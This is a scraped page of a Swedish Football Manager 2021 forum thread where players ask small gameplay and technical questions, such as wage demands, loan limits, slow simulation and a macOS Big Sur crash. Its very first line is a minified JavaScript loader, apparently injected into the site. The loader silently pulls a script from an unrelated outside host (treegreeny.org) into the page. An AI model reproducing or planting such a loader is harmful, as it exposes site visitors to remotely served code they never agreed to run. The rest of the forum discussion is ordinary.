;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Småfrågor – Sida 9 – Football Manager 2021 – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[Klistrad] Småfrågor

198 Inlägg
82 Users
106 Reactions
8,959 Visningar
raca14
(@raca14)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 225
 

@johanuhno Kör du med en ändrad databas?


   
SvaraCitera
(@johanuhno)
Active Member
Blev medlem: 4 år sedan
Inlägg: 5
 

@raca14 

Ja det gör jag


   
SvaraCitera
(@johanuhno)
Active Member
Blev medlem: 4 år sedan
Inlägg: 5
 

@raca14 

Ja det gör jag

 


   
SvaraCitera
raca14
(@raca14)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 225
 

@johanuhno 

Kan vara det som är problemet...

Säger inte att det är så, men risken för det är ganska stor... Är det kanske en uppskjuten match pga spelschema och Europaspel?


   
SvaraCitera
(@johanuhno)
Active Member
Blev medlem: 4 år sedan
Inlägg: 5
 

@raca14 

Det står inget om uppskjutna matcher.


   
SvaraCitera
raca14
(@raca14)
Reputable Member
Blev medlem: 4 år sedan
Inlägg: 225
 

@johanuhno 

Ok. Då lär det ha buggat sig... tyvärr.


   
SvaraCitera
Skojardu
(@skojardu)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 23
 

Vill värva en kille från danmark för han kontrakt går ut första juli , han har 45k i månaden i danmark.

Jag vill ta honom till Blåvitt och då vill  jäveln ha 453k i månaden!?!?!!  

Ibland har man inte kunnat värvat dessa efter deras lönekrav men så ser man att han går till något hollänskt lag o acepterar 135k i månaden , WTF!?!?!?!

Är detta något ni känner igen?


   
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
 

@skojardu en tanke.. Kan det vara så att han vill ha en så pass hög lön(i förhållande till den han vill ha i Holland) just för att Allsvenskan är en betydligt sämre liga och därigenom ett betydligt sämre skyltfönster?

Är helt med dig i det du säger men om vi vänder blickarna mot någon sorts parallell till realismen så kan man också hänga med lite i resonemanget spelaren gör här i lönekraven.


   
Skojardu reacted
SvaraCitera
Skojardu
(@skojardu)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 23
 
Postad av: @daniel-nilsson

@skojardu en tanke.. Kan det vara så att han vill ha en så pass hög lön(i förhållande till den han vill ha i Holland) just för att Allsvenskan är en betydligt sämre liga och därigenom ett betydligt sämre skyltfönster?

Är helt med dig i det du säger men om vi vänder blickarna mot någon sorts parallell till realismen så kan man också hänga med lite i resonemanget spelaren gör här i lönekraven.

Ok. så spelet är verkligare än vad jag trodde då.... Kanon isf!


   
SvaraCitera
(@bohminho)
New Member
Blev medlem: 4 år sedan
Inlägg: 4
 

Jag har börjat en save Woking i NL, jag har lånat in 3 spelare från The Championship, vill låna fler men det går inte då låneknappen för alla spelare från PL-L1 är grå. Provar då att låna från L2-NL och det funkar att låna men när lånet gått igenom så säger spelet att jag redan har sex långtidslån men jag har bara tre. Jag har avslutat tre lån som fanns i klubben då jag tillträdde. Någon som kan hjälpa mig?


   
SvaraCitera
hersson
(@hersson)
New Member
Blev medlem: 4 år sedan
Inlägg: 2
 

Tjena! Är ganska ny till fm världen. Jag har lite problem med att det tar väldigt lång tid att simulera mellan dagarna på spelet. Någon som har tips på några inställningar eller ngt sådant som gör att simuleringen går snabbare?

ska tilläggas att jag har en bra pc så det är inte den problemet ligger på.


   
SvaraCitera
Samaras
(@samaras)
Active Member
Blev medlem: 4 år sedan
Inlägg: 7
 

https://www.youtube.com/watch?v=bWs4IKlx5SY&ab_channel=Zealand

Kolla denna videon så får du bra tips, hjälpte mig mycket med min lite slöare laptop.


   
SvaraCitera
(@kaptenrod)
New Member
Blev medlem: 3 år sedan
Inlägg: 1
 
  • Tja alla FM nerdieees! Jag e här av många anledningar, och har följt många råd o tips  för att lära mig spela FM, har testat och testat men det vill sig aldrig. Nu behöver jag en någon villig som vill ställa upp och hjälpa mig för den som har lust och har tid... Behöver hjälp med hur man drar igång en säsong på allvar, för när jag går all in i nånting så rör jag bara till det för mig själv, hur jag än vänder o vrider på det. Behöver just din hjälp o en hjälpande hand och dra igång min FM resa.

   
SvaraCitera
(@liverbird74)
New Member
Blev medlem: 4 år sedan
Inlägg: 2
 

Hej,

Jag uppgraderade mitt MAC os till Big Sur och nu funkar dessvärre inte mitt FM21 mer.

På sätt och vis kanske bra så spelar jag mindre, men ibland blir man sugen på en säsong.

Någon som vet något om detta?
Kanske bara att vänta tills nästa FM22 kommer, för jag orkar inte nergradera mitt os.

 


   
SvaraCitera
(@liverbird74)
New Member
Blev medlem: 4 år sedan
Inlägg: 2
 

Jag ska testa om detta fungerar:

 

Restart your computer and launch Steam
From a game's library page, select Manage > Properties.
Select the Local files tab and click the Verify integrity of game files... button.
Steam will verify the game's files - this process may take several minutes.


   
SvaraCitera
(@kante22)
New Member
Blev medlem: 3 år sedan
Inlägg: 1
 

Så jag har den här unga pojken med mycket potential som redan kan starta mot Rashford, Sterling och Greenwood (allt i topp). Men efter att ha återvänt från ett lån krävde han ett drag, trots att jag har gett honom en rimlig speltid jämfört med hans "hot prospect" -avtal. Jag föreställde mig att jag skulle chatta med honom och trycka på dialogrutan "vill gå", men den är inte där, och när jag gör det, säger en pop-up "spelaren har inte angett önskan att lämna klubben"? Vad tror du? Vad pratar du om?! Ja, det har han, och han orsakar kaos i min miljö. Finns det någon som kan hjälpa mig med detta? Jag är inte säker på vad jag ska göra om jag vill behålla spelaren.

This post was modified 3 år sedan by trashbag

   
SvaraCitera
(@kingkrille83)
Active Member
Blev medlem: 4 år sedan
Inlägg: 14
 

Hej har fler än ja råkat ut för detta dilemma ja lyckades efter mycket om och men få till uppdateringen så ja starta om min Ifk Göteborg med Hamsik i laget och nu går det betydligt sämre ja lirar med samma uppställning som ja gjorde i saven då ja ej hade Hamsik i laget ja slutade 3a ska sägas första året i saven utan Hamsik och nu med han i laget ligger ja 6a efter 12matcher ja upplever även att ja släpper in betydligt mycket mer mål! Spontant känns de ju konstigt att ja ska va svagare i matcher med mer bra spelare i truppen! Är de så enkelt att ja fick en sjuk säsong med en trupp som inte är bättre och att de är lite såhär spelet funkar att de kan flyga högt i visa uppstarter?


   
SvaraCitera
(@farfetched)
New Member
Blev medlem: 4 år sedan
Inlägg: 1
 

Dagens datum till ära, någon mer som råkat ut för detta? Tog detta seriöst då styrelsen har pumpat in pengar trots klubbens ekonomiska problem.

 

 


   
Micke and Daniel Nilsson reacted
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
 

Åkte också på en idag!


   
farfetched reacted
SvaraCitera
(@forza-rossoneri)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 81
 

Vet inte riktigt var jag ska fråga detta så får bli här. Jag undrar vad forumfolket helst skulle vilja se, att jag fortsätter på min Guiseley rapport eller startar en ny rapport med Milan med Pirlo som manager som skulle börja dock säsongen 2057-2058? Jag kan inte bestämma själv ? 


   
SvaraCitera
Sida 9 / 10
Share: